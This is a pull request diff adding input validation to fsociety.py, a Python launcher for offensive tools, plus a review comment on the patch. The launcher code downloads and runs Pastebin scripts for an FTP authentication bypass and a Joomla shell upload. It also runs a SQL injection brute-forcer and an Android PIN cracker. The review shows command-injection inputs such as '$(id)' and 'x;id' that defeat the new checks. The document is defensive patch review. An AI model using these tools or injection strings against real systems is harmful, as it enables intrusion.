Security Fix for Remote Code Execution - huntr.dev #117

wants to merge 11 commits into
base: master
173 changes: 130 additions & 43 deletions fsociety.py
Expand Up @@ -466,8 +466,18 @@ def install(self):
def run(self):
clearScr()
print(self.nmapLogo)
target = raw_input(self.targetPrompt)
self.menu(target)
target = raw_input(self.targetPrompt).split(' ')[0]
test_target = target.split('/')
try:
socket.gethostbyname(test_target[0])
if len(test_target) > 1:
try:
int(test_target[1])
except KeyboardInterrupt:
informationGatheringMenu()
self.menu(target)
except KeyboardInterrupt:
informationGatheringMenu()

def menu(self, target):
clearScr()
Expand Down Expand Up @@ -558,8 +568,19 @@ def __init__(self):
self.install()
clearScr()
print(self.wpscanLogo)
target = raw_input(" Enter a Target: ")
self.menu(target)
target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.menu(target)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))
Expand Down Expand Up @@ -618,10 +639,21 @@ def __init__(self):
self.install()
clearScr()
print(self.CMSmapLogo)
target = raw_input(" Enter a Target: ")
self.run(target)
response = raw_input(continuePrompt)

target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.run(target)
response = raw_input(continuePrompt)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))

Expand Down Expand Up @@ -686,9 +718,20 @@ def __init__(self):
self.install()
clearScr()
print(self.doorkLogo)
target = raw_input(" Enter a Target: ")
self.run(target)
response = raw_input(continuePrompt)
target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.run(target)
response = raw_input(continuePrompt)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))
Expand All @@ -699,8 +742,6 @@ def install(self):
os.system("pip install beautifulsoup4 requests Django==1.11")

def run(self, target):
if not "http://" in target:
target = "http://" + target
logPath = "logs/doork-" + \
strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt"
try:
Expand Down Expand Up @@ -999,8 +1040,12 @@ def install(self):
os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir)

def run(self):
target = raw_input("Enter Target IP: ")
os.system("brutex %s" % target)
target = raw_input("Enter Target IP: ").split(' ')[0]
try:
socket.gethostbyname(target)
os.system("brutex %s" % target)
except KeyboardInterrupt:
fsociety()


class arachni:
Expand All @@ -1024,9 +1069,20 @@ def install(self):
"gem install bundler && bundle install --without prof && rake install")

def run(self):
target = raw_input("Enter Target Hostname: ")
os.system("arachni %s --output-debug 2> %sarachni/%s.log" %
(target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime())))
target = raw_input("Enter Target Hostname: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
os.system("arachni %s --output-debug 2> %sarachni/%s.log" %
(target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime())))
except KeyboardInterrupt:
fsociety()

# Updated to Here

Expand All @@ -1044,9 +1100,18 @@ def gabriel():
print("Abusing authentication bypass of Open&Compact (Gabriel's)")
os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
clearScr()
common_commands = ['get','put','list','GET','PUT','LIST']
os.system("python gabriel.py")
ftpbypass = raw_input("Enter Target IP and Use Command:")
os.system("python gabriel.py %s" % ftpbypass)
ftpbypass = raw_input("Enter Target IP and Use Command:").split(' ')
try:
socket.gethostbyname(ftpbypass[0])
if ftpbypass[1] in common_commands:
os.system("python gabriel.py %s %s" % (ftpbypass[0],ftpbypass[1]))
else:
print 'Command Error!!. Please check the Use command.'
fsociety()
except KeyboardInterrupt:
fsociety()


def sitechecker():
Expand All @@ -1068,11 +1133,19 @@ def ifinurl():
def bsqlbf():
clearScr()
print("This tool will only work on blind sql injection")
cbsq = raw_input("select target: ")
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")

cbsq = raw_input("select target: ").split(' ')[0]
test_target = urlparse(cbsq)
try:
socket.gethostbyname(test_target.netloc)
if test_target.scheme != '':
cbsq = test_target.scheme + '://' + test_target.netloc + test_target.path
else:
cbsq = test_target.netloc + test_target.path
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")
except KeyboardInterrupt:
fsociety()

def atscan():
print ("Do You To Install ATSCAN ?")
Expand Down Expand Up @@ -1106,16 +1179,21 @@ def joomlarce():
os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
clearScr()
print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
jmtarget = raw_input("Select a targets list:")
os.system("python temp.py %s" % jmtarget)

jmtarget = raw_input("Select a targets list:").split(' ')[0]
try:
if os.path.exists(jmtarget):
os.system("python temp.py %s" % jmtarget)
except KeyboardInterrupt:
fsociety()

def inurl():
dork = raw_input("select a Dork:")
output = raw_input("select a file to save:")
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
webHackingMenu.completed("InurlBR")
dork = raw_input("select a Dork:").split(' ')[0]
output = raw_input("select a file to save:").split(' ')[0]
all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:']
if dork in all_dorks:
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
webHackingMenu.completed("InurlBR")


def insinurl():
Expand Down Expand Up @@ -1311,20 +1389,29 @@ def shellnoob():


def androidhash():
key = raw_input("Enter the android hash: ")
salt = raw_input("Enter the android salt: ")
os.system(
"git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git")
os.system(
"cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
key = raw_input("Enter the android hash: ").split(' ')[0]
salt = raw_input("Enter the android salt: ").split(' ')[0]
symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+', ' ']
if [symbol for symbol in symbols if symbol not in key and symbol not in salt] == symbols:
os.system(
"git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git")
os.system(
"cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
else:
print 'Hash or Slat Error. Please check the hash and salt.'
fsociety()


def cmsfew():
print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
target = raw_input("Select a target: ")
os.system(
"wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
os.system("python cms.py %s" % target)
target = raw_input("Select a target: ").split(' ')[0]
try:
socket.gethostbyname(target)
os.system(
"wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
os.system("python cms.py %s" % target)
except KeyboardInterrupt:
fsociety()


def smtpsend():
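Review bot: The new input checks do not close the command injection this PR is meant to fix, because every tool is still launched through `os.system` with a shell string: `socket.gethostbyname()` only vets the host part, while `url.path` in the four `urlparse`-based prompts (wpscan, CMSmap, doork, `arachni.run`) and in `bsqlbf`, and the unchecked `output` value in `inurl`, are concatenated straight into the command, so a target like `http://example.com/$(id)` resolves fine and still executes `id`; `.split(' ')[0]` only truncates at a literal space. The `androidhash` denylist likewise omits `;`, backticks, quotes, `<`, `>` and newlines, so a "hash" of `x;id` passes the check and reaches the shell. The reliable fix is to stop building shell strings and pass an argument list, e.g. in `arachni.run`: `with open('%sarachni/%s.log' % (logDir, strftime('%Y-%m-%d_%H:%M:%S', gmtime())), 'w') as log: subprocess.call(['arachni', target, '--output-debug'], stderr=log)`, and to validate the hash and salt with an allowlist such as `re.match(r'^[0-9a-fA-F]+$', key)` rather than a symbol denylist. Separately, every new `try` block catches only `KeyboardInterrupt`, so an unresolvable name raises an uncaught `socket.gaierror` instead of returning to the menu; catching `socket.error` (which covers `gaierror` on Python 2) with a short message would keep the prompt usable. The `dork in all_dorks` test in `inurl` also appears to compare the user's dork against what looks like a list of inurlbr option names, which would reject any real dork; please confirm that was intended.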